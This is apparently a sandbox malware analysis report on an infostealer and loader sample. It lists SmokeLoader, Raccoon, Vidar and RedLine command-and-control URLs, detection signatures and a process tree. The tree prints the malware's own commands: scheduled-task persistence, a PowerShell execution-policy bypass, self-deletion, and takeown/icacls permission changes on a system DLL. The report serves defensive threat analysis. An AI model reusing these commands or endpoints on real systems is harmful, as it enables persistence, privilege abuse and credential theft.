Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
11/10/2021, 17:18
Static task
static1
Behavioral task
behavioral1
Sample
c10ebeb0d29119a2a7177f857318d012.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
c10ebeb0d29119a2a7177f857318d012.exe
Resource
win10v20210408
General
-
Target
c10ebeb0d29119a2a7177f857318d012.exe
-
Size
337KB
-
MD5
c10ebeb0d29119a2a7177f857318d012
-
SHA1
687672a6b2001376c192991c1b5237cf6467f393
-
SHA256
4eb02a90be27af84c49a2f62da8e179e5117d82db4e25c7a2c80e2954583bdb3
-
SHA512
447e1010864262bc642613b1f597507689d92353930a398bd85a24e2728ea7eb6ad75c413943966a5828422b380de2eff69725c0e5468125e2d9fa35a16df292
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
fbe5e97e7d069407605ee9138022aa82166657e6
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
Extracted
vidar
41.3
1033
https://mas.to/@oleg98
-
profile_id
1033
Extracted
raccoon
1.8.2
8d179b9e611eee525425544ee8c6d77360ab7cd9
-
url4cnc
http://teletop.top/agrybirdsgamerept
http://teleta.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
redline
@Nastya_ero
45.14.49.66:21899
Extracted
raccoon
1.8.2
98fe4f3d1d73378234d0a82f16cb8ad29d2d3e75
-
url4cnc
http://telemirror.top/kaba4ello
http://tgmirror.top/kaba4ello
http://telegatt.top/kaba4ello
http://telegka.top/kaba4ello
http://telegin.top/kaba4ello
https://t.me/kaba4ello
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/472-140-0x00000000005E0000-0x00000000005FC000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Arkei Stealer Payload 4 IoCs
resource yara_rule behavioral1/memory/1684-127-0x0000000000400000-0x0000000000B71000-memory.dmp family_arkei behavioral1/memory/1684-128-0x0000000000400000-0x0000000000B71000-memory.dmp family_arkei behavioral1/memory/1684-129-0x0000000000400000-0x0000000000B71000-memory.dmp family_arkei behavioral1/memory/1684-136-0x0000000000400000-0x0000000000B71000-memory.dmp family_arkei -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/876-70-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar behavioral1/memory/876-69-0x00000000002A0000-0x0000000000376000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
flow pid Process 79 2596 powershell.exe 80 2596 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
pid Process 368 2443.exe 876 29DF.exe 848 34B9.exe 1280 3B2F.exe 1796 404F.exe 1964 53B1.exe 1684 6879.exe 472 6C80.exe 1784 76AE.exe 2200 7FF2.exe 2288 86D6.exe 2508 9374.exe 456 services32.exe 2472 mine.exe 2552 2soft.exe 2656 services64.exe 2836 sihost32.exe 3004 sihost64.exe 1840 services32.exe 2428 avvfhbw -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2756 icacls.exe 2820 icacls.exe 2836 icacls.exe 2848 icacls.exe 2384 takeown.exe 2396 icacls.exe 2712 icacls.exe 2688 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x001100000001222b-101.dat vmprotect behavioral1/files/0x001100000001222b-103.dat vmprotect behavioral1/memory/1964-104-0x0000000000B30000-0x0000000001976000-memory.dmp vmprotect behavioral1/memory/2472-259-0x0000000000400000-0x0000000000B3C000-memory.dmp vmprotect behavioral1/memory/2552-262-0x0000000000400000-0x0000000000CF9000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 34B9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6879.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6879.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7FF2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7FF2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9374.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9374.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 34B9.exe -
Deletes itself 1 IoCs
pid Process 1268 Process not Found -
Loads dropped DLL 41 IoCs
pid Process 368 2443.exe 1268 Process not Found 1268 Process not Found 368 2443.exe 368 2443.exe 368 2443.exe 368 2443.exe 368 2443.exe 368 2443.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1268 Process not Found 1720 WerFault.exe 1684 6879.exe 1268 Process not Found 1268 Process not Found 1684 6879.exe 1684 6879.exe 1684 6879.exe 1684 6879.exe 2288 86D6.exe 2288 86D6.exe 2288 86D6.exe 2288 86D6.exe 2288 86D6.exe 2288 86D6.exe 2288 86D6.exe 1852 cmd.exe 1852 cmd.exe 2200 7FF2.exe 2200 7FF2.exe 2624 cmd.exe 2624 cmd.exe 2456 Process not Found 2456 Process not Found 1180 conhost.exe 1180 conhost.exe 2860 conhost.exe 2860 conhost.exe 2996 cmd.exe -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 2712 icacls.exe 2688 icacls.exe 2756 icacls.exe 2820 icacls.exe 2836 icacls.exe 2848 icacls.exe 2384 takeown.exe 2396 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000700000001221a-73.dat themida behavioral1/memory/848-80-0x0000000000A70000-0x0000000000A71000-memory.dmp themida behavioral1/files/0x047600000000b53c-169.dat themida behavioral1/memory/2200-175-0x0000000001050000-0x0000000001051000-memory.dmp themida behavioral1/files/0x000a000000012296-201.dat themida behavioral1/memory/2508-206-0x00000000000D0000-0x00000000000D1000-memory.dmp themida -
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 86D6.exe -
Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 2443.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 86D6.exe Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 86D6.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9374.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 34B9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6879.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7FF2.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 848 34B9.exe 1684 6879.exe 2200 7FF2.exe 2508 9374.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1144 set thread context of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 2860 set thread context of 3064 2860 conhost.exe 153 -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D5SAG2RLQSVNIMJAHKC6.temp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1720 876 WerFault.exe 29 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c10ebeb0d29119a2a7177f857318d012.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c10ebeb0d29119a2a7177f857318d012.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c10ebeb0d29119a2a7177f857318d012.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 6879.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6879.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2700 schtasks.exe 2152 schtasks.exe 2576 schtasks.exe 2760 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 1844 timeout.exe 2104 timeout.exe 3056 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 2748 taskkill.exe 2072 taskkill.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0d4c331c4bed701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2764 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1524 c10ebeb0d29119a2a7177f857318d012.exe 1524 c10ebeb0d29119a2a7177f857318d012.exe 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1268 Process not Found -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 464 Process not Found 2456 Process not Found 2456 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1524 c10ebeb0d29119a2a7177f857318d012.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeShutdownPrivilege 1268 Process not Found Token: SeShutdownPrivilege 1268 Process not Found Token: SeDebugPrivilege 1720 WerFault.exe Token: SeShutdownPrivilege 1268 Process not Found Token: SeDebugPrivilege 848 34B9.exe Token: SeDebugPrivilege 472 6C80.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeShutdownPrivilege 1268 Process not Found Token: SeShutdownPrivilege 1268 Process not Found Token: SeDebugPrivilege 2316 powershell.exe Token: SeShutdownPrivilege 1268 Process not Found Token: SeShutdownPrivilege 1268 Process not Found Token: SeDebugPrivilege 2200 7FF2.exe Token: SeDebugPrivilege 2412 conhost.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2508 9374.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 3020 conhost.exe Token: SeShutdownPrivilege 1268 Process not Found Token: SeRestorePrivilege 2712 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1032 WMIC.exe Token: SeIncreaseQuotaPrivilege 1032 WMIC.exe Token: SeAuditPrivilege 1032 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1032 WMIC.exe Token: SeIncreaseQuotaPrivilege 1032 WMIC.exe Token: SeAuditPrivilege 1032 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2344 WMIC.exe Token: SeIncreaseQuotaPrivilege 2344 WMIC.exe Token: SeAuditPrivilege 2344 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2344 WMIC.exe Token: SeIncreaseQuotaPrivilege 2344 WMIC.exe Token: SeAuditPrivilege 2344 WMIC.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 2204 conhost.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 1180 conhost.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2860 conhost.exe Token: SeLockMemoryPrivilege 3064 explorer.exe Token: SeLockMemoryPrivilege 3064 explorer.exe Token: SeDebugPrivilege 3028 conhost.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1268 Process not Found 1268 Process not Found 1268 Process not Found 1268 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1144 wrote to memory of 1524 1144 c10ebeb0d29119a2a7177f857318d012.exe 27 PID 1268 wrote to memory of 368 1268 Process not Found 28 PID 1268 wrote to memory of 368 1268 Process not Found 28 PID 1268 wrote to memory of 368 1268 Process not Found 28 PID 1268 wrote to memory of 368 1268 Process not Found 28 PID 1268 wrote to memory of 876 1268 Process not Found 29 PID 1268 wrote to memory of 876 1268 Process not Found 29 PID 1268 wrote to memory of 876 1268 Process not Found 29 PID 1268 wrote to memory of 876 1268 Process not Found 29 PID 1268 wrote to memory of 848 1268 Process not Found 30 PID 1268 wrote to memory of 848 1268 Process not Found 30 PID 1268 wrote to memory of 848 1268 Process not Found 30 PID 1268 wrote to memory of 848 1268 Process not Found 30 PID 1268 wrote to memory of 1280 1268 Process not Found 33 PID 1268 wrote to memory of 1280 1268 Process not Found 33 PID 1268 wrote to memory of 1280 1268 Process not Found 33 PID 1268 wrote to memory of 1280 1268 Process not Found 33 PID 1268 wrote to memory of 1796 1268 Process not Found 34 PID 1268 wrote to memory of 1796 1268 Process not Found 34 PID 1268 wrote to memory of 1796 1268 Process not Found 34 PID 876 wrote to memory of 1720 876 29DF.exe 36 PID 876 wrote to memory of 1720 876 29DF.exe 36 PID 876 wrote to memory of 1720 876 29DF.exe 36 PID 876 wrote to memory of 1720 876 29DF.exe 36 PID 1268 wrote to memory of 1964 1268 Process not Found 37 PID 1268 wrote to memory of 1964 1268 Process not Found 37 PID 1268 wrote to memory of 1964 1268 Process not Found 37 PID 368 wrote to memory of 1028 368 2443.exe 38 PID 368 wrote to memory of 1028 368 2443.exe 38 PID 368 wrote to memory of 1028 368 2443.exe 38 PID 368 wrote to memory of 1028 368 2443.exe 38 PID 1028 wrote to memory of 1844 1028 cmd.exe 40 PID 1028 wrote to memory of 1844 1028 cmd.exe 40 PID 1028 wrote to memory of 1844 1028 cmd.exe 40 PID 1028 wrote to memory of 1844 1028 cmd.exe 40 PID 1268 wrote to memory of 1684 1268 Process not Found 42 PID 1268 wrote to memory of 1684 1268 Process not Found 42 PID 1268 wrote to memory of 1684 1268 Process not Found 42 PID 1268 wrote to memory of 1684 1268 Process not Found 42 PID 1268 wrote to memory of 472 1268 Process not Found 43 PID 1268 wrote to memory of 472 1268 Process not Found 43 PID 1268 wrote to memory of 472 1268 Process not Found 43 PID 1268 wrote to memory of 472 1268 Process not Found 43 PID 1964 wrote to memory of 696 1964 53B1.exe 44 PID 1964 wrote to memory of 696 1964 53B1.exe 44 PID 1964 wrote to memory of 696 1964 53B1.exe 44 PID 1268 wrote to memory of 1784 1268 Process not Found 46 PID 1268 wrote to memory of 1784 1268 Process not Found 46 PID 1268 wrote to memory of 1784 1268 Process not Found 46 PID 1684 wrote to memory of 2064 1684 6879.exe 48 PID 1684 wrote to memory of 2064 1684 6879.exe 48 PID 1684 wrote to memory of 2064 1684 6879.exe 48 PID 1684 wrote to memory of 2064 1684 6879.exe 48 PID 2064 wrote to memory of 2104 2064 cmd.exe 50 PID 2064 wrote to memory of 2104 2064 cmd.exe 50 PID 2064 wrote to memory of 2104 2064 cmd.exe 50 PID 2064 wrote to memory of 2104 2064 cmd.exe 50 PID 696 wrote to memory of 2144 696 powershell.exe 51 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 86D6.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 86D6.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\2443.exeC:\Users\Admin\AppData\Local\Temp\2443.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2443.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\29DF.exeC:\Users\Admin\AppData\Local\Temp\29DF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 8882⤵
- Loads dropped DLL
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\34B9.exeC:\Users\Admin\AppData\Local\Temp\34B9.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:848
-
C:\Users\Admin\AppData\Local\Temp\3B2F.exeC:\Users\Admin\AppData\Local\Temp\3B2F.exe1⤵
- Executes dropped EXE
PID:1280
-
C:\Users\Admin\AppData\Local\Temp\404F.exeC:\Users\Admin\AppData\Local\Temp\404F.exe1⤵
- Executes dropped EXE
PID:1796 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\404F.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"3⤵PID:2676
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"4⤵
- Creates scheduled task(s)
PID:2700
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services32.exe"3⤵
- Loads dropped DLL
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\services32.exeC:\Users\Admin\AppData\Local\Temp\services32.exe4⤵
- Executes dropped EXE
PID:456 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services32.exe"5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"6⤵
- Executes dropped EXE
PID:2836 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"7⤵PID:2492
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\53B1.exeC:\Users\Admin\AppData\Local\Temp\53B1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\06ipggcq.cmdline"3⤵PID:2144
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EA3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7E92.tmp"4⤵PID:2164
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2384
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2396
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2688
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2756
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2820
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2836
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2848
-
-
